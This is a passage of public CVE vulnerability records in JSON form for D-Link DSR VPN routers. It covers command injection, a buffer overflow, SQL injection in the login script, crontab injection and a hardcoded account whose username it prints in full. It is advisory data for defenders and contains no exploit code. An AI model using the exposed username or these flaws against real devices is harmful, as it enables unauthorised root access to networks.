        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "19A81670-E7DA-4179-A0A5-00938299BF6C",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "AFF423A8-2E0B-4618-B384-5C97B4315B88",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "82F0849C-8622-4839-BE2B-DCDE9CE7B257",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000ac_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E7F64A55-D6BF-4440-8336-22E5C1BF36D0",
              "versionEndIncluding": "3.17",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000ac:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3DD4F77B-72B4-4261-884C-8F17B52A4643",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered on D-Link DSR-250 3.17 devices. Insufficient validation of configuration file checksums could allow a remote, authenticated attacker to inject arbitrary crontab entries into saved configurations before uploading. These entries are executed as root."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 un problema en los dispositivos D-Link DSR-250 versi\u00f3n 3.17. Una comprobaci\u00f3n insuficiente de checksums del archivo de configuraci\u00f3n, podr\u00eda permitir a un atacante autenticado remoto inyectar entradas crontab arbitrarias en las configuraciones guardadas antes de cargarlas. Estas entradas son ejecutadas como root"
    }
  ],
  "id": "CVE-2020-25758",
  "lastModified": "2024-11-21T05:18:41.153",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-12-15T20:15:16.243",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.dlink.com/en/security-bulletin"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.dlink.com/en/security-bulletin"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-354"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

CVE-2024-57376 (GCVE-0-2024-57376)
Vulnerability from cvelistv5
Published
2025-01-28 00:00
Modified
2025-01-29 15:39
CWE
  • n/a
Summary
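Buffer overflow vulnerability in D-Link DSR-150, DSR-150N, DSR-250, DSR-250N, DSR-500N, and DSR-1000N from 3.13 to 3.17B901C allows unauthenticated users to achieve remote code execution. Note that the CISA-ADP enrichment in the record below scores the attack vector as adjacent network (AV:A) and classifies the weakness as CWE-120, although the CNA lists the CWE as n/a.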
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "ADJACENT_NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 8.8,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-57376",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-01-29T15:38:54.186044Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-120",
                "description": "CWE-120 Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-01-29T15:39:34.881Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer Overflow vulnerability in D-Link DSR-150, DSR-150N, DSR-250, DSR-250N, DSR-500N, DSR-1000N from 3.13 to 3.17B901C allows unauthenticated users to execute remote code execution."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-01-28T21:46:18.934Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://www.dlink.com/en/security-bulletin/"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2024-57376",
    "datePublished": "2025-01-28T00:00:00.000Z",
    "dateReserved": "2025-01-09T00:00:00.000Z",
    "dateUpdated": "2025-01-29T15:39:34.881Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2020-25757 (GCVE-0-2020-25757)
Vulnerability from cvelistv5
Published
2020-12-15 19:27
Modified
2024-08-04 15:40
Severity ?
CWE
  • n/a
Summary
A lack of input validation and access controls in Lua CGIs on D-Link DSR VPN routers may result in arbitrary input being passed to system command APIs, resulting in arbitrary command execution with root privileges. This affects DSR-150, DSR-250, DSR-500, and DSR-1000AC with firmware 3.14 and 3.17.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T15:40:36.937Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.dlink.com/en/security-bulletin"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A lack of input validation and access controls in Lua CGIs on D-Link DSR VPN routers may result in arbitrary input being passed to system command APIs, resulting in arbitrary command execution with root privileges. This affects DSR-150, DSR-250, DSR-500, and DSR-1000AC with firmware 3.14 and 3.17."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-12-15T19:27:32",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.dlink.com/en/security-bulletin"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2020-25757",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A lack of input validation and access controls in Lua CGIs on D-Link DSR VPN routers may result in arbitrary input being passed to system command APIs, resulting in arbitrary command execution with root privileges. This affects DSR-150, DSR-250, DSR-500, and DSR-1000AC with firmware 3.14 and 3.17."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.dlink.com/en/security-bulletin",
              "refsource": "MISC",
              "url": "https://www.dlink.com/en/security-bulletin"
            },
            {
              "name": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195",
              "refsource": "MISC",
              "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
            },
            {
              "name": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/",
              "refsource": "MISC",
              "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2020-25757",
    "datePublished": "2020-12-15T19:27:32",
    "dateReserved": "2020-09-18T00:00:00",
    "dateUpdated": "2024-08-04T15:40:36.937Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2020-18568 (GCVE-0-2020-18568)
Vulnerability from cvelistv5
Published
2021-02-02 13:22
Modified
2024-08-04 14:00
Severity ?
CWE
  • n/a
Summary
The UPnP service on the D-Link DSR-250 (3.14) and DSR-1000N (2.11B201) contains a command injection vulnerability, which can cause remote command execution.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T14:00:49.387Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.dlink.com/en/security-bulletin/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The D-Link DSR-250 (3.14) DSR-1000N (2.11B201) UPnP service contains a command injection vulnerability, which can cause remote command execution."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-02-02T13:22:19",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.dlink.com/en/security-bulletin/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2020-18568",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The D-Link DSR-250 (3.14) DSR-1000N (2.11B201) UPnP service contains a command injection vulnerability, which can cause remote command execution."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.dlink.com/en/security-bulletin/",
              "refsource": "MISC",
              "url": "https://www.dlink.com/en/security-bulletin/"
            },
            {
              "name": "https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a",
              "refsource": "MISC",
              "url": "https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2020-18568",
    "datePublished": "2021-02-02T13:22:19",
    "dateReserved": "2020-08-13T00:00:00",
    "dateUpdated": "2024-08-04T14:00:49.387Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2013-5945 (GCVE-0-2013-5945)
Vulnerability from cvelistv5
Published
2020-02-11 01:54
Modified
2024-08-06 17:29
Severity ?
CWE
  • n/a
Summary
Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T17:29:42.358Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.exploit-db.com/exploits/30061"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2013-10-28T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-02-11T01:54:15",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.exploit-db.com/exploits/30061"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-5945",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf",
              "refsource": "MISC",
              "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
            },
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf",
              "refsource": "MISC",
              "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
            },
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf",
              "refsource": "MISC",
              "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
            },
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf",
              "refsource": "MISC",
              "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
            },
            {
              "name": "http://www.exploit-db.com/exploits/30061",
              "refsource": "MISC",
              "url": "http://www.exploit-db.com/exploits/30061"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-5945",
    "datePublished": "2020-02-11T01:54:15",
    "dateReserved": "2013-09-27T00:00:00",
    "dateUpdated": "2024-08-06T17:29:42.358Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2020-25758 (GCVE-0-2020-25758)
Vulnerability from cvelistv5
Published
2020-12-15 19:27
Modified
2024-08-04 15:40
Severity ?
CWE
  • n/a
Summary
An issue was discovered on D-Link DSR-250 3.17 devices. Insufficient validation of configuration file checksums could allow a remote, authenticated attacker to inject arbitrary crontab entries into saved configurations before uploading. These entries are executed as root.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T15:40:36.946Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.dlink.com/en/security-bulletin"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered on D-Link DSR-250 3.17 devices. Insufficient validation of configuration file checksums could allow a remote, authenticated attacker to inject arbitrary crontab entries into saved configurations before uploading. These entries are executed as root."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-12-15T19:27:55",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.dlink.com/en/security-bulletin"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2020-25758",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered on D-Link DSR-250 3.17 devices. Insufficient validation of configuration file checksums could allow a remote, authenticated attacker to inject arbitrary crontab entries into saved configurations before uploading. These entries are executed as root."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.dlink.com/en/security-bulletin",
              "refsource": "MISC",
              "url": "https://www.dlink.com/en/security-bulletin"
            },
            {
              "name": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195",
              "refsource": "MISC",
              "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
            },
            {
              "name": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/",
              "refsource": "MISC",
              "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2020-25758",
    "datePublished": "2020-12-15T19:27:55",
    "dateReserved": "2020-09-18T00:00:00",
    "dateUpdated": "2024-08-04T15:40:36.946Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2013-7004 (GCVE-0-2013-7004)
Vulnerability from cvelistv5
Published
2013-12-19 02:00
Modified
2024-08-06 17:53
Severity ?
CWE
  • n/a
Summary
D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account with the username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T17:53:46.023Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
          },
          {
            "name": "30061",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "http://www.exploit-db.com/exploits/30061"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2013-12-06T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
